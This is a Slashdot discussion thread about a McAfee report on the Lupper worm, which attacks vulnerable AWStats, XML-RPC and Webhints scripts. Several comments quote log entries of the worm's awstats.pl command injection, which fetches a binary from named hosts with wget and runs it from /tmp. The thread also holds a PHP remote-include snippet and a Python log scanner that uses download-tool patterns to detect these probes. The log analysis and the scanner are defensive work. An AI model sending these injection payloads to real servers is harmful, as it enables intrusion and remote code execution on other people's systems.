
Linux Lupper.Worm In the Wild

CmdrTaco posted more than 8 years ago | from the inching-its-way-around-the-net dept.


jurt1235 writes "McAfee reports that a Linux worm has been found in the wild. The Linux/Lupper.worm is a derivative of the Linux/Slapper worm which also exists for BSD, just to be cross-platform. From the McAfee description: The worm blindly attacks web servers by sending malicious http requests on port 80. If the target server is running one of the vulnerable scripts at specific URLs and is configured to permit external shell commands and remote file download in the PHP/CGI environment, a copy of the worm could be downloaded and executed."


363 comments

CONTINUE: (5, Funny)

xtracto (837672) | more than 8 years ago | (#13978478)

Next is a collection of messages telling that it is the fault of the system administrators and not a problem of the Linux distributions.

p.s. BURN KARMA BURN!

Re:CONTINUE: (1, Funny)

EraserMouseMan (847479) | more than 8 years ago | (#13978535)

Of course, Linux is perfect by definition.

And I'm sure this worm was written by a Microsoftie or possibly by Bill Gates himself.

Re:CONTINUE: (4, Insightful)

freeweed (309734) | more than 8 years ago | (#13978690)

Well, actually, yes. Seeing as no Linux distribution installs and runs a webserver, plus one of the affected PHP utilities, by default, this one is squarely on the administrator's shoulders.

Understanding just WHAT a vulnerability affects is the key to knowing who's responsible.

Re:CONTINUE: (2, Insightful)

ksjfhdsalf (892941) | more than 8 years ago | (#13978704)

You're damn right it's the system admin's fault. Because the worm can only get in if your Linux server "is configured to permit external shell commands and remote file download in the PHP/CGI environment, a copy of the worm could be downloaded and executed". Not like you couldn't fuck a Windows server the same way. ...upload - FuckYou.bat ...execute - www.dumbass.com/UnsecureDir/FuckYou.bat

Remarkably Useless page. (5, Interesting)

Short Circuit (52384) | more than 8 years ago | (#13978479)

First, what vulnerability does it exploit? I wasn't able to find any decent info on Linux/Slapper, and that's all it references.

Second, how do you remove it? Quoth the page:
Removal Instructions
AVERT recommends to always use latest DATs and engine . This threat will be cleaned if you have this combination.

Additional Windows ME/XP removal considerations

Re:Remarkably Useless page. (3, Informative)

TheSpoom (715771) | more than 8 years ago | (#13978500)

It doesn't say what software it tries to exploit but it does say which scripts. I'd post them here but it would be a waste of space; they're about halfway down on the McAfee page.

I'd say if your website has one of those scripts I'd look into updating or removing whatever software it is that has the vulnerability.

Re:Remarkably Useless page. (4, Insightful)

tomhudson (43916) | more than 8 years ago | (#13978552)

More alarmist shit (and old news at that - The Reg reported this last week).

Some php scripts that have as much to do with linux as a vulnerability in, say, photoshop, has to do with xp.

The anti-virus writers are publicity whores looking to sensationalize their product, because in a few years nobody will be using them (Windows users will be stuck with the "free" version from Microsoft, and BSD/OSX/Linux users don't need an anti-virus).

Re:Remarkably Useless page. (0)

Anonymous Coward | more than 8 years ago | (#13978565)

The McAfee page does not list the actual scripts just potential locations for the script. Hence you are a troll.

Re:Remarkably Useless page. (1)

tomhudson (43916) | more than 8 years ago | (#13978763)

I wouldn't call the gp poster a troll. I'd say it's more like the antivirus company trolling us. The only reason the risk is rated "low" is because their rating scale doesn't go below that.

Re:Remarkably Useless page. (5, Informative)

gowen (141411) | more than 8 years ago | (#13978513)

According to ZDNet/Symantec [zdnet.com]
"The worm exploits three vulnerabilities to propagate: the XML-RPC for PHP Remote Code Injection vulnerability; AWStats Rawlog Plugin Logfile Parameter Input Validation vulnerability; and Darryl Burgdorf's Webhints Remote Command Execution Vulnerability, according to Symantec's online description of the worm.

The XML-RPC flaw affects blogging, wiki and content management software and was discovered earlier this year. Patches are available for most systems. AWStats is a log analyzer tool; a fix for the flaw has been available since February. Darryl Burgdorf's Webhints is a hint generation script; no fixes are available for the script, according to Symantec's DeepSight Alert Services."

Other links (4, Informative)

AndroidCat (229562) | more than 8 years ago | (#13978599)

Security Focus [securityfocus.com] eWeek [eweek.com] CNet [com.com]

It's not Windows (5, Informative)

max born (739948) | more than 8 years ago | (#13978735)

From the Security Focus article: Affected systems will need to be wiped and have the OS reinstalled, in most cases.

Apache usually runs as user nobody with very limited privileges. I doubt you'd need to wipe and reinstall the OS. That's why lupper runs in /tmp.

PHP exploit, not directly a linux problem? (5, Insightful)

Anonymous Coward | more than 8 years ago | (#13978480)

Seems kind of wrong to name it exclusively a linux problem.

Re:PHP exploit, not directly a linux problem? (5, Informative)

mysqlrocks (783488) | more than 8 years ago | (#13978542)

Calling it a PHP exploit would be wrong as well. It's an exploit of specific applications written in PHP (AWStats and Drupal from what I could tell).

Re:PHP exploit, not directly a linux problem? (3, Informative)

rbochan (827946) | more than 8 years ago | (#13978713)

Calling it a PHP exploit would be wrong as well. It's an exploit of specific applications written in PHP (AWStats and Drupal from what I could tell).

According to this article [com.com] , AWStats was patched back in February.

Re:PHP exploit, not directly a linux problem? (2, Interesting)

EraserMouseMan (847479) | more than 8 years ago | (#13978568)

Is it possible for this exploit to occur under any other OS other than Linux? If so, then maybe Linux is not the root cause, but it is definitely "a linux problem".

Re:PHP exploit, not directly a linux problem? (0)

Anonymous Coward | more than 8 years ago | (#13978628)

So if someone writes a worm that exploits a hole in a Java app, can we claim it's a Solaris-only worm? How about C#-based worms?

Re:PHP exploit, not directly a linux problem? (2, Insightful)

sqlrob (173498) | more than 8 years ago | (#13978651)

The worm is, since it downloads an executable.

The security holes are most likely generic.

How can we get some free press? (3, Insightful)

ivan256 (17499) | more than 8 years ago | (#13978484)

Oh, well we've got this PHP worm... Why don't we call it a Linux worm and the press will just eat it up!

Re:How can we get some free press? (4, Insightful)

jellomizer (103300) | more than 8 years ago | (#13978529)

Because it seems to only effect Linux and BSD systems (With a different worm). Other systems running PHP are not effected. So yes it is a linux worm. Like many of the Windows worms are not Windows Worms, but IE or OutLook Worms.

Re:How can we get some free press? (5, Insightful)

sqlrob (173498) | more than 8 years ago | (#13978576)

IE Worm = Windows worm.

Remember, IE is integrated into the OS according to MS, therefore it is a Windows worm.

Re:How can we get some free press? (-1, Flamebait)

Anonymous Coward | more than 8 years ago | (#13978611)

And we'll just conveniently ignore the part about Outlook, shall we?

Troll-faced monkey fucker...

Re:How can we get some free press? (1)

slavemowgli (585321) | more than 8 years ago | (#13978659)

Then it should be a Linux/*BSD worm, and even that would still be misleading at best, as PHP is what's the problem here. Yes, it's PHP on specific platforms only, but the hole is in PHP, not Linux or *BSD, so it *should* be called a "PHP worm affecting Linux/*BSD platforms", or something similar.

Re:How can we get some free press? (0)

Anonymous Coward | more than 8 years ago | (#13978694)

Effect is a noun. Affect is a transitive verb.

"It only *****s Linux and BSD systems" - you want a verb. Hence, you wanted to use affect.

There are rare uses of effect as a verb and affect as a noun, but I can tell that you are quite common, so you probably don't need to know much about them.

Re:How can we get some free press? (2, Insightful)

SmellTheCoffee (808375) | more than 8 years ago | (#13978729)

An IE Worm or Outlook Worm is absolutely **a windows worm** since they are all designed by Microsoft and integrated tightly in the OS. Linus didn't write PHP and any Linux distro or BSD's don't require you to install PHP. You are free to install or uninstall PHP. Attributing this worm to Linux is like blaming Windows for an Adobe Acrobat vulnerability.

Re:How can we get some free press? (2, Interesting)

cnelzie (451984) | more than 8 years ago | (#13978770)

Except the blasted media only calls them "Computer Worms", they do not mention Windows as the problem. That is why every time one of those stupid announcements makes it onto "Good Morning America", I get a call from the boss asking if our servers are safe and every time, I have to say, that is a Windows problem, not a Linux problem.

It's annoying that they don't call those Windows Worms/Virus/Trojan attacks...

So.... (0)

Anonymous Coward | more than 8 years ago | (#13978487)

We must make an effort to get infected?

if it attacks PHP cross-platform... (4, Insightful)

frankie (91710) | more than 8 years ago | (#13978489)

...then it's a PHP/*nix worm, not Linux specifically.

Heck there's decent odds it could be modified to attack OSX PHP too. A shame the linked article provides ZERO information about exactly which scripts (and versions thereof) are vulnerable.

Re:if it attacks PHP cross-platform... (0)

Anonymous Coward | more than 8 years ago | (#13978582)

Theoretically, yes, it could be modified to attack OS X. The problem is that the non-server version, at least, doesn't have PHP enabled by default, and it's not the easiest thing for a normal user to enable. Thus, it could attack OS X Server installs, assuming the administrator had enabled PHP, but that's a really small number of people. If it was a binary worm, then it just wouldn't be able to spread. Script worms are a lot easier to defend against, since they tend not to change from platform to platform, so ClamAV and similar should pick them up and block them without too much trouble.

Also.. (0)

handmedowns (628517) | more than 8 years ago | (#13978495)

The target has to be standing on one foot, and it needs to be the third Wednesday of the month in February.

Really, cmon now.. this gets news? OK, Bravo.. a linux worm.. take away the fact that it's really a web vulnerability that seems to take advantage of a "shell" it could be a solaris/irix/aix/openserver/bsd worm as well..

But for the smear campaign, let's just call it the linux worm to stir up the zealots.

Sadly a preview of things to come because... (5, Insightful)

Assmasher (456699) | more than 8 years ago | (#13978498)

...Linux is more and more popular with corporations holding valuable and important data.

Success is a double-edged sword. ;)

Re:Sadly a preview of things to come because... (0)

Anonymous Coward | more than 8 years ago | (#13978523)

You seem to have misspelled 'hatter' as 'masher' in your user name.

Linux what? (0, Redundant)

psyeye (883344) | more than 8 years ago | (#13978501)

So it's just the name of the worm or does anyone seriously think this is a Linux-worm? It's a web-server worm - nothing more than that!


psyeye

Re:Linux what? (0)

Anonymous Coward | more than 8 years ago | (#13978653)

Are we sure it's not a denial of service attack?

Complete infection (5, Funny)

soren.harward (1153) | more than 8 years ago | (#13978505)

All sysadmins who are still running this insecure setup are advised to patch your systems immediately. Yes, all fourteen of you.

Re:Complete infection (0)

Anonymous Coward | more than 8 years ago | (#13978626)

Hey, there's 13. I've patched already!

Been around earlier? (1, Interesting)

Anonymous Coward | more than 8 years ago | (#13978507)

According to http://searchsecurity.techtarget.com/qna/0,289202,sid14_gci955041,00.html [techtarget.com] , this worm started in 2002... or am I mistaken?

Re:Been around earlier? (1)

jurt1235 (834677) | more than 8 years ago | (#13978755)

Well, if it turns out to be a dupe, then it took forever for the fixes. For example WordPress 1.5.1 v2 is still vulnerable. 1.5.2 is now just around. Just as for some other software. I would then say that this was a seriously ignored problem.

OUTGOING (-1, Offtopic)

Anonymous Coward | more than 8 years ago | (#13978515)

HELLO WORLD
K-BYE

Conditions for infection... (4, Insightful)

xutopia (469129) | more than 8 years ago | (#13978520)

"If the target server is running one of the vulnerable scripts at specific URLs and is configured to permit external shell commands and remote file download in the PHP/CGI environment, a copy of the worm could be downloaded and executed." I'm thinking this is funny as hell. How many people configure apache this way?

Re:Conditions for infection... (0)

Anonymous Coward | more than 8 years ago | (#13978591)

The problem is, everyone starts somewhere. Not everyone who runs a web-server is a genius at administering them. I tried for six months, and finally gave up. I just didn't know enough to keep it up to date and not crashing. Granted, half my problems were caused by data corruption on the part of my host, but I didn't know much. I would assume I did not setup Apache to do this, but who knows. So to assume that no one is vulnerable to this is nonsense... not everyone is a technical expert on every aspect of the computing world.

Re:Conditions for infection... (5, Funny)

maxwell demon (590494) | more than 8 years ago | (#13978648)

Hey, I've found a way to write a true Linux worm! It can infect all Linux computers which have a user named "wormhole" with password "unsafe", and have a suid-root copy of bash installed at /bin/rootbash which is executable by user "wormhole". Ah, and of course the user "wormhole" must be able to remote login through either rlogin or ssh with password authentication enabled. To spread, the worm also needs the file /etc/wormspreadrc, which must contain a list of other vulnerable computers, one hostname or IP number per line.

SCNR

Re:Conditions for infection... (5, Informative)

smoking2000 (611012) | more than 8 years ago | (#13978670)

The command it runs is:
|echo;echo YYY;cd /tmp;wget 24.224.174.18/listen;chmod +x listen;./listen 216.102.212.115;echo YYY;echo|
It is passed to awstats.pl in a request like:
GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1
There are also POST request to xmlrpc.php pages, like:
POST /drupal/xmlrpc.php HTTP/1.1
So if you have /tmp mounted noexec this should not be a problem.

Re:Conditions for infection... (1)

Ramses0 (63476) | more than 8 years ago | (#13978750)

Not configuration of apache, but configuration of PHP.

Basically, it's whether you allow the following:

A lot of people have #1 (since they don't see the difficulty in allowing that, and in some cases it is hella-useful).

#2 is just plain dumb.

I don't remember what PHP ships with defaults nowadays (I think yes to shell commands at least), it's possible that they don't allow "http://" (remote file protocols) in their later releases.

--Robert

Re:Conditions for infection... (2, Informative)

Ramses0 (63476) | more than 8 years ago | (#13978776)

Damned slashdot eats my code examples. Re-post.

It's Not configuration of apache, but configuration of PHP. Basically, it's whether you allow the following:

<?php
    // #1: run a shell command through the backtick operator
    //     (only works when shell execution is not disabled in php.ini)
    $foo = `ls`;

    // #2: include() a file fetched over HTTP from another host
    //     (only works when allow_url_fopen / remote includes are enabled)
    $bar = include("http://foo.com/example.txt");
?>

A lot of people have #1 (since they don't see the difficulty in allowing that, and in some cases it is hella-useful for hacking stuff together).

#2 is just plain dumb.

I don't remember what PHP ships with defaults nowadays (I think yes to shell commands at least), it's possible that they don't allow "http://" (remote file protocols) by default in their later releases.

--Robert

Before all teh MSFT fanboys jump on this, (5, Funny)

Anonymous Coward | more than 8 years ago | (#13978522)

Paraphrased from the virus description;

IF you run a specific kernel version with some special module
AND you run one of a couple specific versions of one package not installed by default
AND you have a very "generic" config on that package
AND you have some plugins enabled, but not configured for security
AND you are on a world routable IP address
AND you have some specific vulnerable scripts,

THEN you might need to take a look at if you are at risk.

Paraphrased from the virus description of most MSFT worms:

IF you run an MSFT operating system
AND you haven't reformatted your HDD in the last hour

THEN it's time to pucker up and kiss the sucker goodbye..

-GenTimJS

Re:Before all teh MSFT fanboys jump on this, (-1, Troll)

Assmasher (456699) | more than 8 years ago | (#13978550)

You don't feel hypocritical about calling M$ zealots fanboys when you write crap like that? LOL.

Re:Before all teh MSFT fanboys jump on this, (0)

Anonymous Coward | more than 8 years ago | (#13978631)

LOL says the Assmasher
wondering why
they modded him
into oblivion

Re:Before all teh MSFT fanboys jump on this, (1, Insightful)

Assmasher (456699) | more than 8 years ago | (#13978703)

That's funny, and a typical slashdot experience. Someone bashes M$ when something that could even be remotely construed as critical of Linux, and then someone like me points out the hypocrisy of their post, and get modded as a troll. LOL. Next thing you know it will be modded 'Nazi'. Standard slashdot/internet model.

Re:Before all teh MSFT fanboys jump on this, (0)

Anonymous Coward | more than 8 years ago | (#13978714)

Did you post that from a cell phone?

It's not the MSFT fanboys you have to worry about (0)

Anonymous Coward | more than 8 years ago | (#13978563)

It's the AAPL fanboys you have worry about hereabouts on slashdot: they are all moderators a re-up on quality crack just came through.

Re:Before all teh MSFT fanboys jump on this, (1)

a302b (585285) | more than 8 years ago | (#13978685)

...is a derivative of the Linux/Slapper worm which also exists for BSD, just to be crossplatform.
Can someone help me out here? Isn't BSD supposed to be secure by default? And only when you know what you are doing are you able to loosen restrictions? So if, as the parent so kindly pointed out:
IF you run a specific kernel version with some special module
AND you run one of a couple specific versions of one package not installed by default
AND you have a very "generic" config on that package
AND you have some plugins enabled, but not configured for security
AND you are on a world routable IP address
AND you have some specific vulnerable scripts,
THEN you might need to take a look at if you are at risk.
How the HECK does this virus spread on BSD machines???!!!!!

Re:Before all teh MSFT fanboys jump on this, (1)

sootman (158191) | more than 8 years ago | (#13978721)

Isn't BSD supposed to be secure by default?

Um, yeah, and AFAIK, part of that includes not having the webserver on by default. You turn it on, you're at risk.

So let me get this straight (-1, Flamebait)

AKAImBatman (238306) | more than 8 years ago | (#13978539)

Linux has a smaller Market Share than Mac OS X, yet it's still getting targeted by virus writers? Is there something wrong with this picture?

If the target server is running one of the vulnerable scripts at specific URLs and is configured to permit external shell commands and remote file download in the PHP/CGI environment, a copy of the worm could be downloaded and executed.

*cough*Wouldn't have happened with a J2EE server.*cough*

And in one fell swoop, this virus helpfully explains to everyone why there is a market for J2EE servers, why people use Macs as their Desktops, and why Linux's reputation isn't quite spotless in comparison to Mac OS X. This is particularly interesting because we've had this discussion in several other threads with many people saying that the whole "no viruses" marketing applies as equally to Linux as it does to Macs. Similarly, many have said that PHP is just as useful for Enterprise work as J2EE. Yet these are the types of things these systems were designed to prevent.

Perhaps the most interesting thing is that a Mac *could* be vulnerable to this attack. Yet 99.9% of the Macs out there aren't, because the system doesn't ship with the web server running by default. In other words, Linux is making Microsoft's mistakes all over again. :-(

Re:So let me get this straight (1)

FinestLittleSpace (719663) | more than 8 years ago | (#13978561)

Linux has a huge market share in the server market, idiot.

Re:So let me get this straight (1)

AKAImBatman (238306) | more than 8 years ago | (#13978636)

Except that in order to be attacked, you must have AWStats or WebHints installed. i.e. This isn't corporate software being attacked. It's technologists and power-users who run their own websites.

Re:So let me get this straight (2, Insightful)

Blob Pet (86206) | more than 8 years ago | (#13978601)

Perhaps the most interesting thing is that a Mac *could* be vulnerable to this attack. Yet 99.9% of the Macs out there aren't, because the system doesn't ship with the web server running by default. In other words, Linux is making Microsoft's mistakes all over again.

In the distros I've used, the user has to explicitly choose to have a web server installed. Even after that, the user's probably going to have to explicitly choose to install PHP.

Re:So let me get this straight (1)

bperkins (12056) | more than 8 years ago | (#13978666)

Perhaps the most interesting thing is that a Mac *could* be vulnerable to this attack. Yet 99.9% of the Macs out there aren't, because the system doesn't ship with the web server running by default. In other words, Linux is making Microsoft's mistakes all over again. :-(

As far as I can tell, a default Linux distro isn't vulnerable until you install a vulnerable PHP or CGI script. I don't think many Linux systems ship in this configuration. The reason why this worm exists is due to the wide deployment of Linux HTTP servers with this specific vulnerability. There just aren't many Mac OS X web servers out there to bother with them.

Re:So let me get this straight (1)

AKAImBatman (238306) | more than 8 years ago | (#13978766)

True, very true. Unfortunately, AWStats is extremely popular on personal and small business web servers. Its presence is extremely probable as it's a free and feature complete log analyzer. :-(

I really do wonder if the script can infect an OS X machine running AWStats? Many posters seem to think the answer is 'No'. Sadly, the article is shy on details, but I think the answer may be 'Yes'. Which could make this the first available Mac OS X Virus.

What's really interesting, however, is the fact that the worm is very similar to the Slapper worm [symantec.com] . The only difference is that it exploits common PHP/CGI software rather than Apache itself. A coincidence, or a new revision of the same virus?

Re:So let me get this straight (0)

Anonymous Coward | more than 8 years ago | (#13978688)

Perhaps the most interesting thing is that a Mac *could* be vulnerable to this attack. Yet 99.9% of the Macs out there aren't, because the system doesn't ship with the web server running by default. In other words, Linux is making Microsoft's mistakes all over again. :-(

Web server running by default? Debian doesn't do that. Apache isn't even installed by default. PHP is a separate install from Apache. This worm appears to be a problem with PHP, not Linux. Linux is just a kernel. If distros have Apache/PHP up and running by default, that is not good, but it's wrong to blame Linux for it when the kernel isn't even remotely involved in the vulnerability.

Re:So let me get this straight (1)

niskel (805204) | more than 8 years ago | (#13978734)

Linux ships with a webserver running by default? Last I checked there was no webserver in the kernel. Everything else is up to the distributor.

Re:So let me get this straight (1)

ponds (728911) | more than 8 years ago | (#13978775)

Although the kernel webserver was removed in 2.6, there are a lot of people still running 2.4, which includes a webserver in the kernel.

No one enables it though, I'm just being a smartass.

Re:So let me get this straight (1)

the packrat (721656) | more than 8 years ago | (#13978782)

Linux ships with a webserver running by default? Last I checked there was no webserver in the kernel. Everything else is up to the distributor.
The distributor would be the person who ships it, yes?

Too many ifs (5, Interesting)

SolitaryMan (538416) | more than 8 years ago | (#13978540)

If the target server is running one of the vulnerable scripts at specific URLs and is configured to permit external shell commands and remote file download in the PHP/CGI environment ...

which in practice means that your admin has died a couple of years ago but was never replaced.

Re:Too many ifs (1, Interesting)

Anonymous Coward | more than 8 years ago | (#13978765)

.. or your box is one of gazillions of dedicated servers maintained by hobby admins.

Short of detail (4, Informative)

QuaintRealist (905302) | more than 8 years ago | (#13978544)

So here is some, shamelessly cribbed from eWeek. The worm actually attempts to attack three different web services:

"The XML-RPC hole commonly exists in blogging and Wiki programs. There are now fixes available for this hole for most systems.

AWStats is a popular, open-source log-file analyzer. Only servers which run AWStats 5.0 to 6.3 can be attacked. Versions 6.4, which came out in March, and higher are immune.

Finally, Webhints is an older script program that's designed to set up and maintain a "Hint (Quote/Tip/Joke/Whatever) of the Day" page. Version 1.3 is vulnerable to attack. There is, at this time, no known fix for the program. "

This still does not tell me which blogging/wiki programs are affected, only that "most" have fixes - more info, anyone?

Re:Short of detail (2, Informative)

jurt1235 (834677) | more than 8 years ago | (#13978658)

This list is affected: http://www.securityfocus.com/bid/14088/info [securityfocus.com]

Re:Short of detail (1)

ajs (35943) | more than 8 years ago | (#13978784)

I notice that MediaWiki is NOT on this list. This corresponds to my experience. I had some older weblog software exploited, and had to mop up after it, but my MediaWiki installation was fine.

Of course, MediaWiki is the pet target of some zombie-based spamming attacks right now, but that's not MW's fault, and I can clean up after that ok for now. If it gets worse, I'll have to start using some kind of visual authentication scheme.

Does it look like this? (5, Informative)

Mabonus (185893) | more than 8 years ago | (#13978545)

I just noticed this today, and from what I've heard here it sounds a likely candidate. IP addresses obscured for politeness.

193.166.84 - - [04/Nov/2005:15:10:10 -0700] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| HTTP/1.1" 404 224 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
193.166.84 - - [04/Nov/2005:15:10:12 -0700] "GET /scgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| HTTP/1.1" 404 225 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
193.166.84 - - [04/Nov/2005:15:10:14 -0700] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| HTTP/1.1" 401 3787 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
.
.
.
193.166.84 - - [04/Nov/2005:15:10:31 -0700] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 223 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
193.166.84 - - [04/Nov/2005:15:10:33 -0700] "POST /blog/xmlrpc.php HTTP/1.1" 404 221 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
193.166.84 - - [04/Nov/2005:15:10:34 -0700] "POST /drupal/xmlrpc.php HTTP/1.1" 404 223 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
.
.
.
For 60 hits.

Re:Does it look like this? (0)

Anonymous Coward | more than 8 years ago | (#13978598)

Yes, it's looking for an ancient version of awstats.

Re:Does it look like this? (0)

Anonymous Coward | more than 8 years ago | (#13978676)

...wget%2062%2e101%2e193%2e244...

As you can see this is trying to download a file from some machine that according to whois is/was in Norway and seems to be gone now.

Re:Does it look like this? (1)

smoking2000 (611012) | more than 8 years ago | (#13978774)

I have a variation on this one besides the "flupii" one. This one uses a file called "listen"
GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1
I think there is also a "scout" part, which finds vulnerable hosts, as I also have requests like this:
GET /usage/cgi-bin/awstats.pl?configdir=|echo%20;echo%20;cat%20awstats.pl;echo%20;echo| HTTP/1.1
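As an added example (not code from the thread, McAfee, Symantec or any other vendor), this Python check turns the requests smoking2000 and Mabonus quoted above into a log scan: it decodes the awstats.pl configdir pipe injection, tells the download-and-run dropper apart from the "scout" request that only reads the script back, and flags the blind POSTs to xmlrpc.php. The log lines are constructed, modelled on the ones posted above; the client addresses are RFC 5737 documentation space and the wget targets are the ones quoted in the thread.

```python
"""Spot Lupper/Plupii-style probes in an Apache access log (added example)."""
import re
from urllib.parse import unquote, urlsplit

# Constructed sample lines modelled on the requests quoted in the thread.
# 192.0.2.x is documentation space; lines 4 and 5 are benign controls.
SAMPLE_LOG = """\
192.0.2.10 - - [04/Nov/2005:15:10:10 -0700] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| HTTP/1.1" 404 224 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
192.0.2.10 - - [04/Nov/2005:15:10:12 -0700] "GET /usage/cgi-bin/awstats.pl?configdir=|echo%20;echo%20;cat%20awstats.pl;echo%20;echo| HTTP/1.1" 404 225 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
192.0.2.10 - - [04/Nov/2005:15:10:31 -0700] "POST /drupal/xmlrpc.php HTTP/1.1" 404 223 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
192.0.2.20 - - [04/Nov/2005:15:12:01 -0700] "GET /cgi-bin/awstats.pl?configdir=%2fetc%2fawstats HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.30 - - [04/Nov/2005:15:12:05 -0700] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0"
"""

# Apache combined log: client ident user [timestamp] "METHOD target proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# The requests in the thread wrap a shell command line in '|' ... '|' as the
# configdir value; a plain directory path is the legitimate use of that parameter.
SHELL_PIPE = re.compile(r'^\|(?P<cmd>.*)\|$', re.S)
FETCH_RE = re.compile(r'\b(?:wget|curl|fetch|lynx)\s+(?P<url>\S+)')


def query_params(query: str) -> dict:
    """Split on '&' only: parse_qs also split on ';' in older Pythons, and ';'
    is exactly the separator this payload uses between shell commands."""
    params: dict = {}
    for part in query.split('&'):
        if part:
            key, _, value = part.partition('=')
            params.setdefault(unquote(key), []).append(unquote(value))
    return params


def classify(line: str):
    """Return a finding dict for a suspicious line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m['target'])
    params = query_params(url.query)
    finding = {'ip': m['ip'], 'ts': m['ts'], 'path': url.path,
               'status': int(m['status']), 'commands': [], 'fetch_urls': []}

    if url.path.endswith('awstats.pl'):
        for value in params.get('configdir', []):
            pipe = SHELL_PIPE.match(value)
            if not pipe:
                continue  # ordinary directory value, nothing to flag
            cmds = [c.strip() for c in pipe['cmd'].split(';') if c.strip()]
            fetches = [f['url'] for c in cmds if (f := FETCH_RE.search(c))]
            finding['commands'] = cmds
            finding['fetch_urls'] = fetches
            # A fetch means the worm body is pulled down and run; without one
            # the request is the "scout" that just cats awstats.pl back.
            finding['kind'] = ('awstats-configdir-dropper' if fetches
                               else 'awstats-configdir-scout')
            return finding

    if m['method'] == 'POST' and url.path.endswith('xmlrpc.php'):
        # The access log never shows the XML body, so this is only a lead to
        # check against the application's own log, not proof of exploitation.
        finding['kind'] = 'xmlrpc-post'
        return finding
    return None


def scan(log_text: str) -> list:
    """Findings for every line of log_text that matches a known pattern."""
    return [f for f in map(classify, log_text.splitlines()) if f]


def block_list(findings) -> set:
    """Distinct download locations from dropper commands, for egress filtering
    or for hunting the dropped file under /tmp."""
    return {u for f in findings for u in f['fetch_urls']}


if __name__ == '__main__':
    results = scan(SAMPLE_LOG)
    for f in results:
        print(f"{f['ts']}  {f['ip']:<12} {f['kind']:<26} {f['path']}")
        for c in f['commands']:
            print(f"    $ {c}")
    print('download locations:', sorted(block_list(results)))
```

Run against a real access log, the dropper's `cd /tmp` plus `chmod +x` sequence is also the reason smoking2000's noexec /tmp suggestion blunts this particular variant.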

Linux? (2, Interesting)

noz (253073) | more than 8 years ago | (#13978555)

I dislike the labelling of this worm as Linux/Slapper. The only platform identification is,
This worm spreads by exploiting web servers hosting vulnerable PHP/CGI scripts.
I also know that tomorrow a colleague will say something akin to, "Quit razzing my Windows platforms. Your precious Linux also has security problems." Grrrr...

Re:Linux? (0)

Anonymous Coward | more than 8 years ago | (#13978719)

Karma's a bitch, huh? Or is this just some Windows user who accidentally stumbled across the fact that you use Linux, and you've never given him any crap for any Windows vulnerability ever?

I hope your colleague is every bit as smug as you are when you dump on Windows.

this isn't meant for us (0, Troll)

caffeinemessiah (918089) | more than 8 years ago | (#13978567)

Whichever AV company it was that put out this release, it clearly isn't meant for anyone who's ever used *nix. This message is aimed at potential corporate *nix adopters for whom the lack of viruses might have been a strong selling point. I'm willing to put serious money that there's some lobby cash behind this. This is just like Bush's war - no one with a brain believes it's right, but the majority without the brains do, and that's all that's needed. It's disgusting.

Did some more research (1)

jurt1235 (834677) | more than 8 years ago | (#13978580)

McAfee sucks for real info; look at Symantec [symantec.com] or at my summary [hipersonik.com]. In short: update your software on time. There are some small inconsistencies between what the worm attacks and what needs to be updated, though.

It's a Linux worm? Riiiiiiight.... (0)

crivens (112213) | more than 8 years ago | (#13978588)

It's a Linux worm? Riiiiiiight.... I wonder who originally raised this with McAfee.

More coverage Linux.Plupii description available (1)

jjMick (911387) | more than 8 years ago | (#13978597)

Symantec has a more thorough description page at http://securityresponse.symantec.com/avcenter/venc/data/linux.plupii.html [symantec.com], including links to the XML-RPC PHP1.x library vulnerabilities used by this malware. This worm is also known as Linux.Plupii and Linux/Lupper.A. Internet Storm Center has a lot of technical information at http://isc.sans.org/diary.php?storyid=823 [sans.org]

Linux/BSD only (3, Funny)

WhiteWolf666 (145211) | more than 8 years ago | (#13978623)

Currently, this worm is only compatible with Linux/BSD systems, because they are the only systems with full shell scripting capabilities.

It is rumored that you can obtain the same level of compatibility with the Cygwin Suite, but that is not an officially supported configuration by Microsoft.

Never fear, though, Monad will bring Lupper, and similar PHP/Shell script worms to the Windows platform for the masses!

Seriously, though; isn't everyone fairly aware that PHP ain't that secure?

